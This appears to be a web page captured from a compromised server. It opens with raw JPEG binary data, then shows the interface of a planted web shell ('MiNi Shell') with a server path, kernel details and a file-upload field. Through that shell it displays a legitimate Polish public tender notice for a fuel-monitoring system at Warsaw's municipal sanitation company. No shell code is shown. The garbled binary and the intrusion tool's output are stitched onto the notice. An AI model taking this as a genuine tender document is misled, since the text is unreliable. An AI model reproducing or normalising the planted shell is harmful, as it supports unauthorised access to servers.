JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211222/0032614202-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup, dostawa, montaż oraz wdrożenie i konfiguracja systemu do monitoringu zużycia paliwa w pojazdach eksploatowanych przez Miejskie Przedsiębiorstwo Oczyszczania w m.st. Warszawie sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKIE PRZEDSIĘBIORSTWO OCZYSZCZANIA W M. ST. WARSZAWIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015314451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Obozowa 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-161</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@mpo.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mpo.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Usługi komunalne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup, dostawa, montaż oraz wdrożenie i konfiguracja systemu do monitoringu zużycia paliwa w pojazdach eksploatowanych przez Miejskie Przedsiębiorstwo Oczyszczania w m.st. Warszawie sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c6658b32-58d3-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00326142</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mpowarszawa.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Poufna część specyfikacji warunków zamówienia<br/><br/>Zamawiający informuje, że informacje zawarte w Załączniku nr 1 do Części II SWZ - Opis przedmiotu zamówienia, tj. informacje zawarte w wykazie jednostek taborowych przeznaczonych do doposażenia wraz z danymi technicznymi, mają charakter poufny i nie mogą być udostępniane osobom innym niż Wykonawcy o których mowa poniżej. <br/>W celu zachowania poufności informacji zawartych w Załączniku nr 1 do Części II SWZ - Opis przedmiotu zamówienia, Zamawiający, działając na podstawie przepisu art. 133 ust. 3 ustawy, nie udostępnia tych informacji na stronie internetowej/Platformie. Wykonawcy w celu uzyskania dostępu do informacji zawartych w Załącznik nr 1 do Części II SWZ - Opis przedmiotu zamówienia, tj. Wykazu jednostek taborowych przeznaczonych do doposażenia, zobowiązani są złożyć do Zamawiającego wniosek wraz z zobowiązaniem zachowania poufności uzyskanych informacji. <br/><br/>UWAGA: <br/>Wniosek wraz z zobowiązaniem należy złożyć w oryginale za pośrednictwem Platformy, na której prowadzone jest postępowanie, w formie określonej <br/>w pkt. 5.2. SWZ, z uwzględnieniem pkt. 11 SWZ. <br/><br/>W treści wniosku Wykonawca zobowiązany jest wskazać swoje dane identyfikacyjne, nazwę i nr postępowania, którego wniosek dotyczy, adres poczty elektronicznej, na który zostanie przekazane hasło do poufnej części SWZ, oraz złożyć zobowiązanie do zachowania w tajemnicy treści udostępnionych mu informacji i dokumentów, traktowanych jako informacje poufne, tj. zawartych w Załączniku nr 2 do SWZ - Wzór wniosku o udostępnienie niejawnej części SWZ.<br/><br/>Wnioski nie zawierające wymaganych przez Zamawiającego informacji, określonych wzorem wniosku, o którym mowa powyżej, stanowiącym Załącznik nr 2 do SWZ, jak również wnioski sformułowane w innej postaci niż na wzorze przygotowanym przez Zamawiającego, stanowiącym Załącznik nr 2 do SWZ (jak np. wiadomość mailowa, z której wynika chęć pozyskania przez wykonawcę niejawnej części SWZ, pismo Wykonawcy w sprawie pozyskania niejawnej części SWZ itp.) nie będą przez Zamawiającego rozpatrywane. <br/><br/>Wniosek o udostępnienie poufnej części SWZ wraz z zobowiązaniem może złożyć wyłącznie Wykonawca wykonujący działalność objętą przedmiotem zamówienia.<br/><br/>Wniosek wraz z zobowiązaniem może złożyć wyłącznie osoba uprawniona <br/>do reprezentacji Wykonawcy, która zobowiązana jest uwiarygodnić to uprawnienie. <br/>W odpowiedzi na ww. wniosek, Zamawiający niezwłocznie udostępni ww. Wykonawcy Załącznik nr 1 do Części II SWZ za pośrednictwem Platformy, o której mowa w pkt 5.2. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mpowarszawa.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Numeracja przeniesiona z SWZ.<br/>5.	Sposób porozumiewania się Zamawiającego z Wykonawcami <br/>5.1.	Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, za pośrednictwem Platformy pod adresem:<br/>https://mpowarszawa.ezamawiajacy.pl/servlet/HomeServlet <br/>z zastrzeżeniem pkt 4.18. (w zakresie przekazania hasła do poufnej części SWZ).<br/>5.2.	Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są przy użyciu komunikacji elektronicznej za pośrednictwem Platformy.<br/>5.3.	Dokumentacja postępowania została opublikowana na Platformie. Wszelkie informacje dotyczące niniejszego postępowania (przewidziane ustawą) będą udostępnianie na Platformie. W celu zapoznania się z dokumentacją postępowania: <br/>5.3.1.	przed upływem terminu składania ofert Wykonawca w menu po lewej stronie wybiera zakładkę „Lista Przetargów Pzp”, następnie zakładkę „Aktualne”, wyszukuje przedmiotowe postępowanie i klika w wybrany link, przechodząc do obszaru postępowania. <br/>5.3.2.	po upływie terminu składania ofert Wykonawca w menu po lewej stronie wybiera zakładkę „Lista Przetargów Pzp”, następnie odpowiednią zakładkę, wyszukuje przedmiotowe postępowanie i klika w wybrany link, przechodząc do obszaru postępowania.<br/>5.4.	Zamawiający określa instrukcję korzystania z Platformy:<br/>5.4.1.	Przed upływem terminu składania ofert Wykonawca może zadawać pytania do treści SWZ za pośrednictwem Platformy poprzez funkcjonalność <br/>„ZADAJ PYTANIE” (opcja ta nie wymaga logowania się do Platformy) <br/>lub po przystąpieniu do postępowania poprzez funkcjonalność „PRZYSTĄP <br/>DO POSTĘPOWANIA” i po zalogowaniu się przez Wykonawcę na konto użytkownika, w zakładce „Korespondencja”. Odpowiedź na pytanie zostanie udzielona do wiadomości publicznej na Platformie oraz będzie widoczna dla zalogowanych Wykonawców, którzy przystąpili do postępowania w zakładce „Korespondencja”. <br/>5.4.2.	Po przystąpieniu do postępowania Platforma przekieruje Wykonawcę <br/>na stronę logowania się. W celu zalogowania się należy podać dane użytkownika: e-mail oraz hasło. <br/>5.4.3.	W przypadku, gdy Wykonawca nie posiada konta użytkownika, wypełnia formularz rejestracyjny dostępny po kliknięciu funkcjonalności „Załóż konto <br/>za darmo”. Następnie Wykonawca postępuje zgodnie ze wskazówkami Marketplanet OnePlace, które otrzyma na wskazany w formularzu rejestracyjnym adres e-mail.<br/>5.4.3.1.	Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin („Regulaminu korzystania z Marketplanet OnePlace”), klika polecenie „zarejestruj się”. <br/>5.4.3.2.	Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. <br/>W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty <br/>w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>5.4.3.3.	Założenie konta BASIC wystarczającego do korzystania z Platformy jest bezpłatne.<br/>5.4.4.	Po upływie terminu składania ofert, wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje są przekazywane między Zamawiającym <br/>a Wykonawcą przy użyciu komunikacji elektronicznej za pośrednictwem Platformy, po zalogowaniu się przez Wykonawcę na konto użytkownika, <br/>w zakładce „Korespondencja”.<br/>5.4.5.	W związku z postanowieniami 5.4.4. wszyscy Wykonawcy, w celu bezproblemowej komunikacji z Zamawiającym na Platformie powinni przed upływem terminu składania ofert przystąpić do postępowania na Platformie poprzez funkcjonalność „Przystąp do postępowania” oraz posiadać założone konto w aplikacji Marketplanet OnePlace.<br/>Uwaga! Ciąg dalszy w Sekcji IX - Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Numeracja przeniesiona z SWZ.<br/>28.2.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dn. 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>28.2.1.	administratorem Pani/Pana danych osobowych jest Miejskie Przedsiębiorstwo Oczyszczania w m. st. Warszawie sp. z o.o. z siedzibą w Warszawie przy <br/>ul. Obozowej 43;<br/>28.2.2.	kontakt z Inspektorem Ochrony Danych Osobowych w Miejskim Przedsiębiorstwie Oczyszczania w m. st. Warszawie sp. z o.o.: iodo@mpo.com.pl; <br/>28.2.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Zakup, dostawę, montaż oraz wdrożenie i konfigurację systemu do monitoringu zużycia paliwa w pojazdach eksploatowanych przez Miejskie Przedsiębiorstwo Oczyszczania w m.st. Warszawie sp. z o.o.” (nr postępowania: SZP.27.62.2021.KR) prowadzonym w trybie podstawowym bez negocjacji;<br/>28.2.4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 ustawy oraz art. 74 ust. 1 ustawy; <br/>28.2.5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>28.2.6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>28.2.7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>28.2.8.	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>28.2.9.	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>28.3.	Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Miejskiego Przedsiębiorstwa Oczyszczania w m. st. Warszawie sp. z o.o. oraz spółki Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisanej do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Miejskie Przedsiębiorstwo Oczyszczania w m. st. Warszawie sp. z o.o. prowadzi postępowania <br/>o udzielenie zamówienia publicznego, działającą pod adresem:<br/>−	https://mpowarszawa.ezamawiajacy.pl/servlet/HomeServlet. <br/>28.4.	Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>Uwaga! Ciąg dalszy w Sekcji III, pkt 3.16.)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Uwaga! Ciąg dalszy z Sekcji III, pkt 3.15.)<br/>28.5.	W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/><br/>Uwaga! Ciąg dalszy z Sekcji IV pkt 4.2.9.) Numeracja przeniesiona z SWZ.<br/>13.	Przedmiotowa deklaracja nie dotyczy przypadku odstąpienia od umowy lub rozwiązania umowy lub jej zakończenia z jakiejkolwiek przyczyny przed upływem terminu, na jaki została zawarta, w tym w przypadkach określonych w § 6 i § 8 Projektowanych postanowień umowy - Część V SWZ oraz w przypadku wykonania zastępczego, o którym mowa w § 2 ust. 22 Projektowanych postanowień umowy - Część V SWZ. <br/>14.	Decyzja o dostawach objętych prawem opcji uzależniona będzie od decyzji Zamawiającego, w okolicznościach wykorzystania przez Zamawiającego kwoty przewidzianej na realizację zamówienia podstawowego, podczas gdy na Wykonawcę nałożony w ten sposób zostaje obowiązek realizacji zamówienia do ustalonej w ramach prawa opcji wartości maksymalnej.<br/><br/>Uwaga! Opis do Sekcji IV pkt 4.2.10.) Okres realizacji zamówienia albo umowy ramowej<br/>Przez okres realizacji 42 miesięcy, o którym mowa w Sekcji IV pkt 4.2.10.), rozumie się termin określony w par. 2 Części V SWZ - Projektowane postanowienia umowy - od dnia zawarcia umowy do upływu 36 miesięcy od dnia podpisania bezusterkowego protokołu obioru jakościowo-ilościowego, o którym mowa w par. 2 ust. 3 Części V SWZ - Projektowane postanowienia umowy dla ostatniej jednostki taborowej w terminach i etapach określonych w par. 2 Części V SWZ - Projektowane postanowienia umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP.27.62.2021.KR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup, dostawa, montaż oraz wdrożenie i konfiguracja systemu do monitoringu zużycia paliwa w pojazdach eksploatowanych przez Miejskie Przedsiębiorstwo Oczyszczania w m. st. Warszawie sp. z o.o. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38112100-4 - Globalne systemy nawigacji i pozycjonowania (GPS lub równorzędne)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Numeracja przeniesiona z Części V SWZ - Projektowane postanowienia umowy<br/>9.	Maksymalna planowana ilość jednostek taborowych, która zostanie wyposażona w kompletny system monitoringu zużycia paliwa w okresie realizacji umowy wyniesie 250 szt. Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym:<br/>a)	demontaż i utylizację starych i uszkodzonych sond paliwa w 110 jednostkach taborowych,<br/>b)	zakup, dostawę, montaż, wdrożenie i konfigurację kompletnego systemu (zwanego dalej systemem monitoringu zużycia paliwa) obejmującego m.in. urządzenie rejestrujące GPS, oprogramowanie oraz sondę paliwa w 175 jednostkach taborowych,<br/>c)	szkolenia w zakresie przewidzianym przez Zamawiającego, <br/>d)	usługę serwisową oraz udzielenie gwarancji na zasadach określonych poniżej w odniesieniu do systemu obejmującego jednostki taborowe dostarczone w ramach zamówienia podstawowego.<br/>Umowa w zakresie pkt d) w odniesieniu do usługi serwisowej będzie realizowana od dnia podpisania pierwszego bezusterkowego protokołu odbioru jakościowo-ilościowego, o którym mowa w § 2 ust. 3 umowy dla pierwszej doposażonej jednostki taborowej do dnia, w którym upływa 36 miesięcy od dnia podpisania bezusterkowego protokołu obioru jakościowo-ilościowego, o którym mowa w § 2 ust. 3 umowy dla ostatniej jednostki taborowej. <br/>Umowa w zakresie pkt d) w odniesieniu do udzielenia przez Wykonawcę gwarancji na zasadach określonych w § 4 umowy będzie realizowana w następujący sposób: Wykonawca udzieli Zamawiającemu gwarancji w wymiarze 36 miesięcy w odniesieniu do zainstalowanego systemu dla każdej z jednostek taborowych, a okres gwarancji w odniesieniu do zainstalowanego systemu dla każdej z jednostek taborowych rozpocznie się z chwilą podpisania bezusterkowego protokołu obioru jakościowo-ilościowego, o którym mowa w § 2 ust. 3 umowy dla danej jednostki taborowej. <br/>Okres świadczenia przez Wykonawcę usługi serwisowej musi pokrywać się z okresem, na który udzielono gwarancji dla systemu zainstalowanego na każdej z jednostek taborowych o których mowa w pkt b). W przypadku przedłużenia okresu gwarancji na zasadach określonych w § 4 umowy, okres świadczenia przez Wykonawcę usługi serwisowej ulega przedłużeniu o taki sam czas.<br/>10. Zamawiający zastrzega sobie prawo do realizacji zakresu zamówienia, tj. obejmującego zakup, dostawę, montaż, wdrożenie i konfigurację kompletnego systemu obejmującego m.in. urządzenie rejestrujące GPS, oprogramowanie oraz sondę paliwa w maksymalnie 75 jednostkach taborowych (czyli w dowolnie wybranej przez Zamawiającego liczbie z zakresu 176-250) oraz usługi serwisowej oraz udzielenia gwarancji na zasadach określonych powyżej w ust. 9 (czyli w takim samym zakresie jak dla zamówienia podstawowego) w odniesieniu do systemu obejmującego jednostki taborowe dostarczonego w ramach prawa opcji do jego maksymalnej wielkości określonej powyżej na zasadach prawa opcji. Skorzystanie z prawa opcji uzależnione będzie od decyzji Zamawiającego. Zamawiający przewiduje wykorzystanie prawa opcji w okresie obowiązywania umowy w następujących sytuacjach (kiedy zajdzie co najmniej jedna z nich):<br/>•	gdy nastąpi zwiększenie ilości eksploatowanych jednostek taborowych zasilanych olejem napędowym,<br/>•	w przypadku gdy eksploatacja systemu wykaże nieprawidłowości w gospodarce paliwowej Zamawiającego. <br/>11.	Zamawiający, każdorazowo na 7 dni przed rozpoczęciem realizacji zamówienia częściowego w ramach prawa opcji, poinformuje o tym fakcie Wykonawcę. W razie skorzystania z prawa opcji, na Wykonawcę nałożony w ten sposób zostanie obowiązek realizacji zamówienia w zakresie nie większym niż ustalona w ramach prawa opcji wartość, na warunkach zawartej umowy, bez konieczności negocjacji między Stronami.<br/>12.	Prawem opcji będzie objęty cały przedmiot zamówienia, a realizacja prawa opcji polegać będzie na realizacji zamówień częściowych przedmiotu zamówienia po cenach jednostkowych zaproponowanych przez Wykonawcę w ofercie. <br/>Ciąg dalszy w Sekcji III pkt 3.16.) <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> 